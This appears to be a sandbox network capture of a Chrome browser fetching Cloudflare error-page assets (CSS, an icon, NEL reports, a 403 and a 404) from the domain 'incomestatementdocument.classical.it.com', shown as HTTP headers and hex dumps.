                                                                                        2025-03-20 17:46:24 UTC1043INData Raw: 62 75 74 74 6f 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 31 36 31 2e 37 37 2e 31 33 2e 32 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65
                                                                                        Data Ascii: button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">161.77.13.2</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-foote
                                                                                        2025-03-20 17:46:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.1649703172.67.216.2074436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:24 UTC620OUTGET /cdn-cgi/styles/cf.errors.css HTTP/1.1
                                                                                        Host: incomestatementdocument.classical.it.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: text/css,*/*;q=0.1
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: style
                                                                                        Referer: https://incomestatementdocument.classical.it.com/NC6tS/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:24 UTC411INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:24 GMT
                                                                                        Content-Type: text/css
                                                                                        Content-Length: 24051
                                                                                        Connection: close
                                                                                        Last-Modified: Fri, 14 Mar 2025 21:23:45 GMT
                                                                                        ETag: "67d49e61-5df3"
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 9237075f6bbb42a0-EWR
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Expires: Thu, 20 Mar 2025 19:46:24 GMT
                                                                                        Cache-Control: max-age=7200
                                                                                        Cache-Control: public
                                                                                        Accept-Ranges: bytes
                                                                                        2025-03-20 17:46:24 UTC958INData Raw: 23 63 66 2d 77 72 61 70 70 65 72 20 61 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 62 62 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 72 74 69 63 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 73 69 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 69 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 6e 76 61 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 70 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 65 6e 74 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 69 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 6f 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 64 64 2c 23 63 66 2d 77 72 61 70 70
                                                                                        Data Ascii: #cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapp
                                                                                        2025-03-20 17:46:24 UTC1369INData Raw: 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 6d 6d 61 72 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 61 62 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 66 6f 6f 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 65 61 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 6c 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f
                                                                                        Data Ascii: e,#cf-wrapper strong,#cf-wrapper sub,#cf-wrapper summary,#cf-wrapper sup,#cf-wrapper table,#cf-wrapper tbody,#cf-wrapper td,#cf-wrapper tfoot,#cf-wrapper th,#cf-wrapper thead,#cf-wrapper tr,#cf-wrapper tt,#cf-wrapper u,#cf-wrapper ul{margin:0;padding:0;bo
                                                                                        2025-03-20 17:46:24 UTC1369INData Raw: 31 2e 35 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 36 2c 31 33 39 2c 33 31 2c 2e 33 29 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 73 65 63 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 65 6d
                                                                                        Data Ascii: 1.5!important;text-decoration:none!important;letter-spacing:normal;-webkit-tap-highlight-color:rgba(246,139,31,.3);-webkit-font-smoothing:antialiased}#cf-wrapper .cf-section,#cf-wrapper section{background:0 0;display:block;margin-bottom:2em;margin-top:2em
                                                                                        2025-03-20 17:46:24 UTC1369INData Raw: 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 74 77 6f 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 32 2e 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 32 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69
                                                                                        Data Ascii: ld(2n),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.four>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.two>.cf-column:nth-child(2n){padding-left:22.5px;padding-right:0}#cf-wrapper .cf-columns.cols-2>.cf-column:nth-chi
                                                                                        2025-03-20 17:46:24 UTC1369INData Raw: 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 63 6c 65 61 72 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 31 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73
                                                                                        Data Ascii: ),#cf-wrapper .cf-columns.four>.cf-column:nth-child(odd){clear:none}#cf-wrapper .cf-columns.cols-4>.cf-column:first-child,#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+1),#cf-wrapper .cf-columns.four>.cf-column:first-child,#cf-wrapper .cf-columns
                                                                                        2025-03-20 17:46:24 UTC1369INData Raw: 30 3b 70 61 64 64 69 6e 67 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 7d 23 63 66 2d 77 72 61 70 70 65
                                                                                        Data Ascii: 0;padding:0}#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3{font-weight:400}#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper strong{font-weight:600}#cf-wrapper h1{font-size:36px;line-height:1.2}#cf-wrapper h2{font-size:30px;line-height:1.3}#cf-wrappe
                                                                                        2025-03-20 17:46:24 UTC1369INData Raw: 68 32 2b 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 6f 6c 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 3b 63 6f 6c
                                                                                        Data Ascii: h2+h4,#cf-wrapper h2+h5,#cf-wrapper h2+h6,#cf-wrapper h3+h5,#cf-wrapper h3+h6,#cf-wrapper h3+p,#cf-wrapper h4+p,#cf-wrapper h5+ol,#cf-wrapper h5+p,#cf-wrapper h5+ul{margin-top:.5em}#cf-wrapper .cf-btn{background-color:transparent;border:1px solid #999;col
                                                                                        2025-03-20 17:46:24 UTC1369INData Raw: 3a 23 36 32 61 31 64 38 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 31 36 33 39 35 39 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 69 6d 70 6f 72 74 61 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 3a 68 6f 76 65 72 2c 23
                                                                                        Data Ascii: :#62a1d8;border:1px solid #163959;color:#fff}#cf-wrapper .cf-btn-danger,#cf-wrapper .cf-btn-error,#cf-wrapper .cf-btn-important{background-color:#bd2426;border-color:transparent;color:#fff}#cf-wrapper .cf-btn-danger:hover,#cf-wrapper .cf-btn-error:hover,#
                                                                                        2025-03-20 17:46:24 UTC1369INData Raw: 61 63 65 3a 6e 6f 77 72 61 70 7d 23 63 66 2d 77 72 61 70 70 65 72 20 69 6e 70 75 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 6c 65 63 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 65 78 74 61 72 65 61 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 34 30 34 30 34 30 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 36 36 36 37 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 34 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e
                                                                                        Data Ascii: ace:nowrap}#cf-wrapper input,#cf-wrapper select,#cf-wrapper textarea{background:#fff!important;border:1px solid #999!important;color:#404040!important;font-size:.86667em!important;line-height:1.24!important;margin:0 0 1em!important;max-width:100%!importan
                                                                                        2025-03-20 17:46:24 UTC1369INData Raw: 3a 23 34 30 34 30 34 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 3a 37 2e 35 70 78 20 31 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 3a 65 6d 70 74 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 20 2e 63 66 2d 63 6c 6f 73 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 2e 37 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 70 61 64 64 69 6e
                                                                                        Data Ascii: :#404040;font-size:13px;padding:7.5px 15px;position:relative;vertical-align:middle;border-radius:2px}#cf-wrapper .cf-alert:empty{display:none}#cf-wrapper .cf-alert .cf-close{border:1px solid transparent;color:inherit;font-size:18.75px;line-height:1;paddin


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.164970835.190.80.14436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:24 UTC605OUTOPTIONS /report/v4?s=u%2B2PAc8XzhPotqxNVd624znGEyTjTbFO2fl%2FTLIaQkUMEuWBr3MtXwQa%2FtGbKn%2BzZ6K7NKHVSqb1ZPeQ%2Bq4BMonzjYF9WL24hk8sIPPwAvfxCLl5OyIQED%2B%2FgNjyvhdjgVo3vBkGBFhUWFVbcQZOHD7ayRirvEIAR9QC HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://incomestatementdocument.classical.it.com
                                                                                        Access-Control-Request-Method: POST
                                                                                        Access-Control-Request-Headers: content-type
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:25 UTC336INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        access-control-max-age: 86400
                                                                                        access-control-allow-methods: POST, OPTIONS
                                                                                        access-control-allow-origin: *
                                                                                        access-control-allow-headers: content-length, content-type
                                                                                        date: Thu, 20 Mar 2025 17:46:24 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.1649714172.67.216.2074436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:24 UTC706OUTGET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
                                                                                        Host: incomestatementdocument.classical.it.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://incomestatementdocument.classical.it.com/cdn-cgi/styles/cf.errors.css
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:25 UTC409INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:46:25 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 452
                                                                                        Connection: close
                                                                                        Last-Modified: Fri, 14 Mar 2025 21:23:45 GMT
                                                                                        ETag: "67d49e61-1c4"
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707631ec4425c-EWR
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Expires: Thu, 20 Mar 2025 19:46:25 GMT
                                                                                        Cache-Control: max-age=7200
                                                                                        Cache-Control: public
                                                                                        Accept-Ranges: bytes
                                                                                        2025-03-20 17:46:25 UTC452INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 03 00 00 00 bb 9b 9a ef 00 00 00 33 50 4c 54 45 c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f ab b2 22 ed 00 00 00 11 74 52 4e 53 00 40 30 10 60 8f bf ff ef 7f af 9f df 20 50 cf 70 60 82 c8 9b 00 00 01 2f 49 44 41 54 78 01 bd d3 05 d2 b4 30 10 06 e1 8e 6c de c1 36 dc ff b2 9f 2b 95 c9 12 7e 79 4a 91 46 22 b8 c2 8b c8 80 94 6f 45 1f ac 4c 81 33 f2 ac 03 5b 1e 95 69 32 b5 94 6e 98 57 79 4a c4 91 8a 7a 26 9a 82 a9 af a4 46 95 f5 d0 1a fb 95 c7 62 bf b2 f2 e9 70 7e e3 a7 a0 df ee 7c 3a 74 35 f1 6d b3 b3 99 66 70 af 69 f2 2f 65 ef c7 fa 99 25 de 25 1b c9 b4 f0 6e d2 50 a6 ed fb 65
                                                                                        Data Ascii: PNGIHDR663PLTEE?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?"tRNS@0` Pp`/IDATx0l6+~yJF"oEL3[i2nWyJz&Fbp~|:t5mfpi/e%%nPe


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.164971535.190.80.14436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:25 UTC580OUTPOST /report/v4?s=u%2B2PAc8XzhPotqxNVd624znGEyTjTbFO2fl%2FTLIaQkUMEuWBr3MtXwQa%2FtGbKn%2BzZ6K7NKHVSqb1ZPeQ%2Bq4BMonzjYF9WL24hk8sIPPwAvfxCLl5OyIQED%2B%2FgNjyvhdjgVo3vBkGBFhUWFVbcQZOHD7ayRirvEIAR9QC HTTP/1.1
                                                                                        Host: a.nel.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 417
                                                                                        Content-Type: application/reports+json
                                                                                        Origin: https://incomestatementdocument.classical.it.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:25 UTC417OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 38 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 36 2e 32 30 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6e 63 6f 6d 65 73 74 61 74 65 6d 65 6e 74
                                                                                        Data Ascii: [{"age":2,"body":{"elapsed_time":589,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.216.207","status_code":403,"type":"http.error"},"type":"network-error","url":"https://incomestatement
                                                                                        2025-03-20 17:46:25 UTC214INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        access-control-allow-origin: *
                                                                                        vary: Origin
                                                                                        date: Thu, 20 Mar 2025 17:46:25 GMT
                                                                                        Via: 1.1 google
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.1649716172.67.216.2074436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:46:25 UTC649OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: incomestatementdocument.classical.it.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://incomestatementdocument.classical.it.com/NC6tS/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:46:26 UTC867INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 20 Mar 2025 17:46:26 GMT
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=14400
                                                                                        CF-Cache-Status: EXPIRED
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z4tUuoXenu1DdSi3TLdWbYNPZSDRKN%2BdwUB21%2BaBSkIkHsLguiD8x1jub6kdz0Wn9xjW5Gc0XUNQeY4ylZu4Sqk%2Fj8rfId15BwKE669N9FY3KPOq%2BRefrEDtznxqltwfdyMOhDBS1adDx0mGB8dGnUPdxSYx166p5lMn"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 923707662dddc8b9-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=104856&min_rtt=104022&rtt_var=40676&sent=6&recv=5&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1221&delivery_rate=33660&cwnd=250&unsent_bytes=0&cid=9966a26c7a00b483&ts=1468&x=0"
